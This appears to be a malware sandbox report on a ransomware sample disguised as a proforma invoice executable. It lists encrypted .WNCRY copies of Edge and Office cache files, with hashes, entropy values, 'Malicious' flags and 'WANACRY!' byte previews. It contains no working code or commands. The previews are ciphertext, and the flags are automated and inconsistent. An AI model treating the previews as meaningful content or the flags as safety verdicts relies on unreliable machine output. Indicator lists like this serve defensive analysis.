                                                          Preview:WANACRY!..........(....l..S....q~Ff.H..Qr....a....T.i..dn...b.].T.dfq.[J..)bp.q}J..0...HFX=.}...+.9.pp.3..W.B..._.....[`....q..{..--....M.0.F....6.G..\........a.].7 `.j.....%...M_......U..L~..._.........@.f.O.v..Yn..6k..bu.U.g^..9.J....%.W'}...#3$|.r.nJO....Y........2.n.W.'i.Vt.ehT.....Q?B.y........ .a.....e.}..N|...;^.t...1nVh. )t.D.v6!..(=G..,l?....\l.*..U..#.;.......gA$.}..f.J.f...6.."8..h..R..K...FS..v.f.,.OJ..[.....eKd.N..7i.*....!...Q.\*E=.+I8&X".x..?.%..a.....g...$.].s...d.r...6...Z.../._._....<c7.t..#G.._...5.Wq..(\%.._R..W.D...7.Z.0n...6{.pA......?..P.@.....).K.CN..r..:l..9....v...B.\20....V.>...]`.9.&mb.....x.M.M5...!.$...>..-.R..._..w&.hF..e.4...w..<aCW.....4&_.}.. ..rL..K.`..f......?*'..&.n.I..K.#.C.....f.M.@.$..d..;.z).69m.`6.......f...'6..at4.A..6.Y%..X.......f\Y.&.:.0.&V...UGt.%..o...f..5..9..&BOS...L..w...Z.w'~..{..G.n..3.k..R..<.N.}..a.^Z..z#....$\..(...];.c.....p...&...m.G.......w..-$\-..K.m....,.....)hE.......0..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\tinytile.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1400
                                                          Entropy (8bit):7.858733697729163
                                                          Encrypted:false
                                                          SSDEEP:24:bkojghEGKCuNYtX5hZg7eo/6UpJ0Of3NatdMJQNP9bTOd8XATaDP6H:bkThEfBYR5Dg7j/7Jd3ktdTNVbTu1+Da
                                                          MD5:3AA011D492FFC36B910938E1E7BC6BC8
                                                          SHA1:E7A345AAA70CA469072B3FB6BBE8ED2E643459C9
                                                          SHA-256:7704C5ED533CA576652C32FAB8D452E630810EBE3C04BE10C9D5B14CB5F977CB
                                                          SHA-512:78A38384AF6A379D4CB22AC91E8319CA25DCF5E904C29A06676FE6F68E1DC1F2A5DF8130E5810BEF7DF83E793D42E2053DD7E1FACA11455D7805396B58285E84
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!..........(....l..S....q~Ff.H..Qr....a....T.i..dn...b.].T.dfq.[J..)bp.q}J..0...HFX=.}...+.9.pp.3..W.B..._.....[`....q..{..--....M.0.F....6.G..\........a.].7 `.j.....%...M_......U..L~..._.........@.f.O.v..Yn..6k..bu.U.g^..9.J....%.W'}...#3$|.r.nJO....Y........2.n.W.'i.Vt.ehT.....Q?B.y........ .a.....e.}..N|...;^.t...1nVh. )t.D.v6!..(=G..,l?....\l.*..U..#.;.......gA$.}..f.J.f...6.."8..h..R..K...FS..v.f.,.OJ..[.....eKd.N..7i.*....!...Q.\*E=.+I8&X".x..?.%..a.....g...$.].s...d.r...6...Z.../._._....<c7.t..#G.._...5.Wq..(\%.._R..W.D...7.Z.0n...6{.pA......?..P.@.....).K.CN..r..:l..9....v...B.\20....V.>...]`.9.&mb.....x.M.M5...!.$...>..-.R..._..w&.hF..e.4...w..<aCW.....4&_.}.. ..rL..K.`..f......?*'..&.n.I..K.#.C.....f.M.@.$..d..;.z).69m.`6.......f...'6..at4.A..6.Y%..X.......f\Y.&.:.0.&V...UGt.%..o...f..5..9..&BOS...L..w...Z.w'~..{..G.n..3.k..R..<.N.}..a.^Z..z#....$\..(...];.c.....p...&...m.G.......w..-$\-..K.m....,.....)hE.......0..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\squaretile.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1736
                                                          Entropy (8bit):7.876582738993397
                                                          Encrypted:false
                                                          SSDEEP:48:bkdvDIyR8JTorv5Dc8q/YcG4LdlWh7h5Ft:odvDIb2rBvq/3tdlu7rr
                                                          MD5:AEEC5A9E6E81858DC4326BD7453539F8
                                                          SHA1:5DD2243174509E38BC463ACA65B0DA66F524F31A
                                                          SHA-256:DBEF83841103C08E62AC4EE9EAFDE0815565B9C4A9FED81A9AE983F8CB5C7D22
                                                          SHA-512:63D31337119B591C0E81D56B2858A4D4DEFBC934073394EA876069A3A3CFC34923D258FDF3FC234E05D6A4598ADF04D7C0EB128DB5960FDA7DD136FA32A99E57
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......L6z.Pv.V...=......&.h..). }....U..z....,.......2....~.&9...e..._.r....gU.1...6nG.y....._..-+...........W.xAeY...F..X*.a...U.\....?...!.L..h."a...... .!QzB..@&u......>..3..s.O..9...&:........$]...X.2...JQy.&.,o0'U...".C~...8U..?.......S..[qz9H............^\.w:..9Oh....]...f.(.dl. ..s...J.K..E.....ex{._.....]..9.|.Q.W.....x.N.v...pD.s0@..C.h.QM..W9..#o...X.\....(.J.7L.l....w.A....Z.......4...Y7.%.f.wsT.......x"..NP^..k.b-...d.wf...+.0.Ty..&Z/.......z.Y......[.....&.X..[.hL.zb>K3T....}3...3L...8.qU./B.p.`..6Z..~.H.....T.<.cg..K.[.~.f..T...d.P2.8 .Bj..F%.Rd.j..\..C..t...#W....I.i...~..Ex;D..h.IW/NC....wI...wR%....u~N...#%6B...m. .O...S_..g.T.*r.^ynit....2......3..._.........8{.....%L_...m..@.hdOA...xKm.^OTb........-?.1.2.-.#..l..A$.[..v...qC../;.......s!B...5.E5.|.4..n.....WX.~.u.6..MJ...8.<.mV..............".*.......v.v)7......}...{T.!MrAP.n.,.A6....9..U.V.1....}Tm...`.8.R|.B...).....=..,.p.l..]D.68...@..L[...s..x-...!.....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\squaretile.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1736
                                                          Entropy (8bit):7.876582738993397
                                                          Encrypted:false
                                                          SSDEEP:48:bkdvDIyR8JTorv5Dc8q/YcG4LdlWh7h5Ft:odvDIb2rBvq/3tdlu7rr
                                                          MD5:AEEC5A9E6E81858DC4326BD7453539F8
                                                          SHA1:5DD2243174509E38BC463ACA65B0DA66F524F31A
                                                          SHA-256:DBEF83841103C08E62AC4EE9EAFDE0815565B9C4A9FED81A9AE983F8CB5C7D22
                                                          SHA-512:63D31337119B591C0E81D56B2858A4D4DEFBC934073394EA876069A3A3CFC34923D258FDF3FC234E05D6A4598ADF04D7C0EB128DB5960FDA7DD136FA32A99E57
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......L6z.Pv.V...=......&.h..). }....U..z....,.......2....~.&9...e..._.r....gU.1...6nG.y....._..-+...........W.xAeY...F..X*.a...U.\....?...!.L..h."a...... .!QzB..@&u......>..3..s.O..9...&:........$]...X.2...JQy.&.,o0'U...".C~...8U..?.......S..[qz9H............^\.w:..9Oh....]...f.(.dl. ..s...J.K..E.....ex{._.....]..9.|.Q.W.....x.N.v...pD.s0@..C.h.QM..W9..#o...X.\....(.J.7L.l....w.A....Z.......4...Y7.%.f.wsT.......x"..NP^..k.b-...d.wf...+.0.Ty..&Z/.......z.Y......[.....&.X..[.hL.zb>K3T....}3...3L...8.qU./B.p.`..6Z..~.H.....T.<.cg..K.[.~.f..T...d.P2.8 .Bj..F%.Rd.j..\..C..t...#W....I.i...~..Ex;D..h.IW/NC....wI...wR%....u~N...#%6B...m. .O...S_..g.T.*r.^ynit....2......3..._.........8{.....%L_...m..@.hdOA...xKm.^OTb........-?.1.2.-.#..l..A$.[..v...qC../;.......s!B...5.E5.|.4..n.....WX.~.u.6..MJ...8.<.mV..............".*.......v.v)7......}...{T.!MrAP.n.,.A6....9..U.V.1....}Tm...`.8.R|.B...).....=..,.p.l..]D.68...@..L[...s..x-...!.....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\tinytile.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1352
                                                          Entropy (8bit):7.856238185473883
                                                          Encrypted:false
                                                          SSDEEP:24:bkcft/B6o5qF20+z5YcrPTevtMjVbrT7vmPyGKkDuV0ugfrI4V2KKU9yabCv/wEX:bkK5Yf0Xz5Yc3eS5brPvmvKkSV0ugfrO
                                                          MD5:FD49F28649409E3AC20D5876EC000376
                                                          SHA1:CBCC570A1F9A70EAFA3DD924A7A4DCF37A2A7463
                                                          SHA-256:4743E1EBAE96A17A09EB56DBAAC373DD558E93F4ECE8CF7E83AFE24481CD6616
                                                          SHA-512:2CCEDCCB0450190699441113BF4D1A542B0E4051F183B7384E6D90035EDFD1C3A58A5D6A26FCDEB5943B8834F4E00B2B92901BBDC9C36557BE225EFFF30E0330
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........../..z.m...@.6.|.[....nv...!.xe\..a.u..$....O~CU.`N..2.l.f[]... -".....^...\.B.^..Hh..F..Z.e..DFiR..v........:BU~..Y...8.5.*y|p.;..^.&6.>EK....2.s!d.T..t.+.....w../.?..6_.x.f..q,.5..p.*......Z.?..w.g..-....|.v.._2$i...BH=..d.$k.1 {'....t....$.........R..R..8`S^..e..Uy../.n.^h.dY.......7...!u...t...v.pm...}.:..K..H....`..S5........M..... ...n....!........t$8L.+...+^...].G..M..K.].oj.'..I....J.]6.........<....Xf.....@8.YSc......j...I...Z.....Z..Lh~.j+.pz.[....fl)J.:=.RW....q.`.y.QL.....\J...B..Z.y...2#..~..6F....8k.r.m.b*...f.7.L.=....:g..XNmi{.dUP..........Q.m...+...v.M.a|..3.0....%^.NUYh../.R......=..O......[.Bx....L@..4x./....c.K35.-.....4.n.=..z.6...,...$?...#2i....6......~..~.5...,H..."....Z.d...#c..q....[......If..t.PF....'...u.0..Z.e..5.4..%....7..Iv.E.o....H..0...).9........t..?.sJ...-..r......6..>[....`....Ga2.m..d."..VN.......9W.....4..S.r.gm...b0.K....aYO"^.5/.>YP{d.c1....6.".F....f........j12....u.It.V-C0

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\tinytile.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1352
                                                          Entropy (8bit):7.856238185473883
                                                          Encrypted:false
                                                          SSDEEP:24:bkcft/B6o5qF20+z5YcrPTevtMjVbrT7vmPyGKkDuV0ugfrI4V2KKU9yabCv/wEX:bkK5Yf0Xz5Yc3eS5brPvmvKkSV0ugfrO
                                                          MD5:FD49F28649409E3AC20D5876EC000376
                                                          SHA1:CBCC570A1F9A70EAFA3DD924A7A4DCF37A2A7463
                                                          SHA-256:4743E1EBAE96A17A09EB56DBAAC373DD558E93F4ECE8CF7E83AFE24481CD6616
                                                          SHA-512:2CCEDCCB0450190699441113BF4D1A542B0E4051F183B7384E6D90035EDFD1C3A58A5D6A26FCDEB5943B8834F4E00B2B92901BBDC9C36557BE225EFFF30E0330
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........../..z.m...@.6.|.[....nv...!.xe\..a.u..$....O~CU.`N..2.l.f[]... -".....^...\.B.^..Hh..F..Z.e..DFiR..v........:BU~..Y...8.5.*y|p.;..^.&6.>EK....2.s!d.T..t.+.....w../.?..6_.x.f..q,.5..p.*......Z.?..w.g..-....|.v.._2$i...BH=..d.$k.1 {'....t....$.........R..R..8`S^..e..Uy../.n.^h.dY.......7...!u...t...v.pm...}.:..K..H....`..S5........M..... ...n....!........t$8L.+...+^...].G..M..K.].oj.'..I....J.]6.........<....Xf.....@8.YSc......j...I...Z.....Z..Lh~.j+.pz.[....fl)J.:=.RW....q.`.y.QL.....\J...B..Z.y...2#..~..6F....8k.r.m.b*...f.7.L.=....:g..XNmi{.dUP..........Q.m...+...v.M.a|..3.0....%^.NUYh../.R......=..O......[.Bx....L@..4x./....c.K35.-.....4.n.=..z.6...,...$?...#2i....6......~..~.5...,H..."....Z.d...#c..q....[......If..t.PF....'...u.0..Z.e..5.4..%....7..Iv.E.o....H..0...).9........t..?.sJ...-..r......6..>[....`....Ga2.m..d."..VN.......9W.....4..S.r.gm...b0.K....aYO"^.5/.>YP{d.c1....6.".F....f........j12....u.It.V-C0

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\ew-preload-inline-2523c8c1505f1172be19[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11880
                                                          Entropy (8bit):7.98414820142224
                                                          Encrypted:false
                                                          SSDEEP:192:uPSaG+TEzFviEkpEW+HiGd1KjieQnHCYA2qnDTNVjj1oZOX++TQWcGgZc2ChoYNP:uPpkFIEW+SieQHCY7qn3NVjj1k62fG3P
                                                          MD5:B87097673B7EBED7344EEAFDA5267FE0
                                                          SHA1:E7E97BF9A5B94F36F4BC6D848F96F83F6B9B5C42
                                                          SHA-256:9EB27DFF06BF787E40E94DB19F9842BC4B2445252647FBC3FEF4C7F76C8A855E
                                                          SHA-512:42B097661D8B6C0A9DEED0B20259DB7E193DEF8BE6A7C0F129C055C356C757011033DF401A65FB6993F8D856F95C5DA9892B0177E093FE366F48FF096C2D472A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......}....5.k6o...o.!h...V....|f&RK.y....j..9t.<|SD..P.|..^..S.....\..*.'....a..,..74.....N..\Z.Ty.&..d......r.W..1...#.\......LU.M.i......]..s.}.nD.>.`x.*D..)V.........,\.#y.y..NOW{......X...k..G.V..qILs.z@a.'..|../.>..W..........Wr6.~.....#/...n./....O-........ .o..A.^."L.2./..U.id5Z.b.& 4..#I.f.v.........O..".B7[.....V<..s.r/d.#9"..@,....h..`jn$.. .....8...-...Z,9........{. ...<lm.#.cI.0.....Uh...exhxBtI...O.c......E...H..t#...!..,.:...A...j..T ..t..;X.......tJ.!..$..xS..s.f.>.>.#)9.7.....|....c.&t.?......O2.D.bj].*..c.JP...L.Z.Na.I....)o..<%.....O.X_.V}.....SG.(..B"...tL....J..^A>.1q....W)..q.. ...kC.(.Y.#1..%.$.a.j....1k..HFZ.GX.2...Q.Y..4....\Q..?.......w.}..h....].../o...E%.5..W.=..%.....dxsk.JF...'...`o...+.W.._os.gY.a1..u..E...U...tW.;bX....}.. ...0<w..lg....V'..Ez.2...&.'.K4....!s3...+...1..,...NCE...&H....*..J..Dt...~...W...J.E.,c<....1.9.<.hRf~[~!...............$.........^..h....N........jX..6...Y..x[.mBA1...[.}}'\.T.@

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\ew-preload-inline-2523c8c1505f1172be19[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11880
                                                          Entropy (8bit):7.98414820142224
                                                          Encrypted:false
                                                          SSDEEP:192:uPSaG+TEzFviEkpEW+HiGd1KjieQnHCYA2qnDTNVjj1oZOX++TQWcGgZc2ChoYNP:uPpkFIEW+SieQHCY7qn3NVjj1k62fG3P
                                                          MD5:B87097673B7EBED7344EEAFDA5267FE0
                                                          SHA1:E7E97BF9A5B94F36F4BC6D848F96F83F6B9B5C42
                                                          SHA-256:9EB27DFF06BF787E40E94DB19F9842BC4B2445252647FBC3FEF4C7F76C8A855E
                                                          SHA-512:42B097661D8B6C0A9DEED0B20259DB7E193DEF8BE6A7C0F129C055C356C757011033DF401A65FB6993F8D856F95C5DA9892B0177E093FE366F48FF096C2D472A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......}....5.k6o...o.!h...V....|f&RK.y....j..9t.<|SD..P.|..^..S.....\..*.'....a..,..74.....N..\Z.Ty.&..d......r.W..1...#.\......LU.M.i......]..s.}.nD.>.`x.*D..)V.........,\.#y.y..NOW{......X...k..G.V..qILs.z@a.'..|../.>..W..........Wr6.~.....#/...n./....O-........ .o..A.^."L.2./..U.id5Z.b.& 4..#I.f.v.........O..".B7[.....V<..s.r/d.#9"..@,....h..`jn$.. .....8...-...Z,9........{. ...<lm.#.cI.0.....Uh...exhxBtI...O.c......E...H..t#...!..,.:...A...j..T ..t..;X.......tJ.!..$..xS..s.f.>.>.#)9.7.....|....c.&t.?......O2.D.bj].*..c.JP...L.Z.Na.I....)o..<%.....O.X_.V}.....SG.(..B"...tL....J..^A>.1q....W)..q.. ...kC.(.Y.#1..%.$.a.j....1k..HFZ.GX.2...Q.Y..4....\Q..?.......w.}..h....].../o...E%.5..W.=..%.....dxsk.JF...'...`o...+.W.._os.gY.a1..u..E...U...tW.;bX....}.. ...0<w..lg....V'..Ez.2...&.'.K4....!s3...+...1..,...NCE...&H....*..J..Dt...~...W...J.E.,c<....1.9.<.hRf~[~!...............$.........^..h....N........jX..6...Y..x[.mBA1...[.}}'\.T.@

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\microsoft-365-logo-01d5ecd01a[1].png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):20568
                                                          Entropy (8bit):7.991867390120489
                                                          Encrypted:true
                                                          SSDEEP:384:bdGycRSfoXwbU80vIHrJQoOzBkELFXVEy//uhngFW:bdGyhf4C1oI2oKu8Fld/sgFW
                                                          MD5:FDE241144C275C6DD4E5D4BD09A023CA
                                                          SHA1:0D478D9F91509A12FA4173E45C11FF27B12A390D
                                                          SHA-256:51D50105885A94242A520A9BF38CFE4525E8445FE739FCB3F07EA6514B296B70
                                                          SHA-512:3F0E5A05758BF3D200838CC8239AFB2B751386ACE36E55078EC6EFD8C8DC886A739716578C16CBCB84406A4E5CC47124635DF60138C0769491F75097966FB7CC
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........G..m:..,0A.<...{.L..p.!9.4.=\/@.p.....Jw. . "...@...<.t..k....s>......q.*.V.[vc%.jE_;..X..>...:b....l.2...nB.KL2....,...*.V...].....i.%.J..f..K...+j.| ..G.......B.id.n.%.Hm,7.i.....B.L..4.g...Cyb..9...!$..~.b_6e......V...M3x...s...56^o.O...MD\....4O........].b....<..1.....6......z...)V.!.........z9......s.....V..>.x......jBt...cvT....o..6...Z.P..[.4S..D.lt..........ux'.l.j.....f.....*.1.@..i...g..l.G..R.D...*...}U?N,......NZ.....gl.<3d3......`.@.....y}..UD.J>...w..J......c...P.,.!...l.&...l..U.u...3.n.e......(.....]hO'..0.6k..AM.~=.....g{....b..'.w...F.5.b.2.y.a.....Gh..>..%f;*.j...h./......@W.l\...&.....qc.i.....M.s.7...E&...6.R<.:.:d....Y.R._..n..@r.X$<....F_.g..*..V(.....s2...b..=/^}.......'o..!....N...X2.A.... d..8...rp..t9.d..J]..iX~.!U.c.......%!....8...(.M%HD.Vd.TR.....-tc...d......W...>.......... .....7..q3..c.;?..x#.......L..E+........2f....U.P].*[L......=xce......l.17....O...A..6.'..)P....L8T.|Q.....g#[OiZ.M.U.w

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\microsoft-365-logo-01d5ecd01a[1].png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):20568
                                                          Entropy (8bit):7.991867390120489
                                                          Encrypted:true
                                                          SSDEEP:384:bdGycRSfoXwbU80vIHrJQoOzBkELFXVEy//uhngFW:bdGyhf4C1oI2oKu8Fld/sgFW
                                                          MD5:FDE241144C275C6DD4E5D4BD09A023CA
                                                          SHA1:0D478D9F91509A12FA4173E45C11FF27B12A390D
                                                          SHA-256:51D50105885A94242A520A9BF38CFE4525E8445FE739FCB3F07EA6514B296B70
                                                          SHA-512:3F0E5A05758BF3D200838CC8239AFB2B751386ACE36E55078EC6EFD8C8DC886A739716578C16CBCB84406A4E5CC47124635DF60138C0769491F75097966FB7CC
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........G..m:..,0A.<...{.L..p.!9.4.=\/@.p.....Jw. . "...@...<.t..k....s>......q.*.V.[vc%.jE_;..X..>...:b....l.2...nB.KL2....,...*.V...].....i.%.J..f..K...+j.| ..G.......B.id.n.%.Hm,7.i.....B.L..4.g...Cyb..9...!$..~.b_6e......V...M3x...s...56^o.O...MD\....4O........].b....<..1.....6......z...)V.!.........z9......s.....V..>.x......jBt...cvT....o..6...Z.P..[.4S..D.lt..........ux'.l.j.....f.....*.1.@..i...g..l.G..R.D...*...}U?N,......NZ.....gl.<3d3......`.@.....y}..UD.J>...w..J......c...P.,.!...l.&...l..U.u...3.n.e......(.....]hO'..0.6k..AM.~=.....g{....b..'.w...F.5.b.2.y.a.....Gh..>..%f;*.j...h./......@W.l\...&.....qc.i.....M.s.7...E&...6.R<.:.:d....Y.R._..n..@r.X$<....F_.g..*..V(.....s2...b..=/^}.......'o..!....N...X2.A.... d..8...rp..t9.d..J]..iX~.!U.c.......%!....8...(.M%HD.Vd.TR.....-tc...d......W...>.......... .....7..q3..c.;?..x#.......L..E+........2f....U.P].*[L......=xce......l.17....O...A..6.'..)P....L8T.|Q.....g#[OiZ.M.U.w

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):13176
                                                          Entropy (8bit):7.984407493127241
                                                          Encrypted:false
                                                          SSDEEP:384:Jd1CfXv2vuxl3LtyiRED9N6akP9L8LNuCGE:IfI4l7hx8YCGE
                                                          MD5:D93A389BDBF01CF3536CEE86EED8A1FD
                                                          SHA1:12DE75D7BC8F672D8D25240CF5376CAA53A1259A
                                                          SHA-256:0ED5B29215FBE94D84BE0AD02AC0DFE3BF85D766812017A1C20E518A5E65498B
                                                          SHA-512:36CB6EA530565E465571F59F3A8F89140C15C649633FF87CA6F26B4D4292B2B19B489CFB2BA7736D5FBFB80F298AB6C2457822DC3CCF99148F7777AEE4789A0F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....H....l./0.c|....;\..b|d34..^Ty..?5...*.f.$.^...W..>..a......E...Z.P..WSA...-<.T.f.b.. ..-..xD..&x.D...'.[....4...5. ..E{..'|....o.=[i..l.?...1.9.Oi..R....._..?$.s4....g.'aJ...w..Ao...........w2n..1Dp4...%b.Ly.?.U....V.W..(.M->r+%..f.r.....a.J.r.....^2......{.=.i+t....7_^.....V.....J*..`...b.9..VcE...0.dC..+........h......B...}.%.-6....~.+.....\..Y...x..D` ...-......<.Z.=>J..HjUkf.`U.0.........w..$..Gt.=-.3...s.X..O..M.k.....82..I.ZY.;_..V....A.t.wm.........".>..i...i.K....T..M..P...V.n....K.7.I...a.....}.W\...j..L...X\D.......MeR..*w\}.d.....Y.E...J%.m._.M...\8.5......e.....;.+.a..=q......}.....6...|.........V...d..........~.X2(C:.:i[...?4......hu..:.n.&X.A...sD....tY...=Q...)...r......v.v.._...A..[..P....,Oq...&C......P..%.o....?.K.4.....&.,N...,.h.G...wld.....b."...#..d...Qos..Gk..O..1%.i.....S.J....e..K...]..#...CA...OA..DJF..C....m....@%.C. ..zj.}...;,.Pmo8O~u...:zr..LX..{Hu!M.<.'{B.........f..._.e...m..h...<Z..&

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):13176
                                                          Entropy (8bit):7.984407493127241
                                                          Encrypted:false
                                                          SSDEEP:384:Jd1CfXv2vuxl3LtyiRED9N6akP9L8LNuCGE:IfI4l7hx8YCGE
                                                          MD5:D93A389BDBF01CF3536CEE86EED8A1FD
                                                          SHA1:12DE75D7BC8F672D8D25240CF5376CAA53A1259A
                                                          SHA-256:0ED5B29215FBE94D84BE0AD02AC0DFE3BF85D766812017A1C20E518A5E65498B
                                                          SHA-512:36CB6EA530565E465571F59F3A8F89140C15C649633FF87CA6F26B4D4292B2B19B489CFB2BA7736D5FBFB80F298AB6C2457822DC3CCF99148F7777AEE4789A0F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....H....l./0.c|....;\..b|d34..^Ty..?5...*.f.$.^...W..>..a......E...Z.P..WSA...-<.T.f.b.. ..-..xD..&x.D...'.[....4...5. ..E{..'|....o.=[i..l.?...1.9.Oi..R....._..?$.s4....g.'aJ...w..Ao...........w2n..1Dp4...%b.Ly.?.U....V.W..(.M->r+%..f.r.....a.J.r.....^2......{.=.i+t....7_^.....V.....J*..`...b.9..VcE...0.dC..+........h......B...}.%.-6....~.+.....\..Y...x..D` ...-......<.Z.=>J..HjUkf.`U.0.........w..$..Gt.=-.3...s.X..O..M.k.....82..I.ZY.;_..V....A.t.wm.........".>..i...i.K....T..M..P...V.n....K.7.I...a.....}.W\...j..L...X\D.......MeR..*w\}.d.....Y.E...J%.m._.M...\8.5......e.....;.+.a..=q......}.....6...|.........V...d..........~.X2(C:.:i[...?4......hu..:.n.&X.A...sD....tY...=Q...)...r......v.v.._...A..[..P....,Oq...&C......P..%.o....?.K.4.....&.,N...,.h.G...wld.....b."...#..d...Qos..Gk..O..1%.i.....S.J....e..K...]..#...CA...OA..DJF..C....m....@%.C. ..zj.}...;,.Pmo8O~u...:zr..LX..{Hu!M.<.'{B.........f..._.e...m..h...<Z..&

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):36264
                                                          Entropy (8bit):7.99525127512748
                                                          Encrypted:true
                                                          SSDEEP:768:35XTr92JFG2cwsiIGBa6i3OUhCWhTuwwNg8+qYg0iakIEiVH9YeZK:V392HGc9IGBaLxRhT6gnieR9Yv
                                                          MD5:E38B55A138F130687043C4137520C383
                                                          SHA1:4ABBEC721E1DB5F37D040480766FD70856AB7D02
                                                          SHA-256:D7DAC6D0A27416A3873A4B80EC375B47E1D5DB3BCC8495D2F3E5C75FBED577DE
                                                          SHA-512:1AB0ADCE244CBD9026843F1C941FFE10AED6FC5AA7213E416DC7DB696FD07BB7D09C3F97EDB6093CAB185692D10F22EA38B886B420F35D9BC52118A2622B8D00
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....P.u...F+.<M...:f...f..2...d.......wb.d.....MA..#.+...GP..*.^..M..PN#.&06mYht,B...`DUQ`S.....r...K...h.]]rk...<[..@-..g.e-...h..0e.&u....D..l....X...O..'....g..)F[/....0u_.z_...TEH..#1.....t......@.m.S...x_w~s..4.O.,....C.`T}...{.Mc.E_...................+.ug.^.....x..kN:..0.."....ZJ..]....b..r.j.k...Q..*9v...9.!...e.,..Z..mo.m..../..}G..n}.ir...K..e.L.......w..7\s..2...........1...a....|.......|5(.......b..$..U.&......~...x....x.P..JM..#.\NH.{.....=............5.LC...BY...."..r#1.Y.V....YR./.Lnn...T..Td.........T.....6._.;.Qq..Z.,.X.W...I.~!..`...........;...6.d.u...b|.._L.m7*N.....=@.[.bXg~...G..c.,.....rr..;....R.nt._.#..i..D&....|.......f.#+c.R..'.%L..U>yl....qx...Qox_~D..1.6.!..h...\.....;.*G_.~3]\S.=..f..|.@..CEE.g..,A.2?IV.....M......EL.L....#$.jI.=j<...&C....!9/G..:8.d.s.23..Cg.........mg..ij.k.[.M.i\W.?...z........G.|=7#..u...,?W.g..N........;..EH..zy:.']b.%.._.~.E9..m~yU.9b......%S.^...L.....f..G.W.O../.<i2L..R......

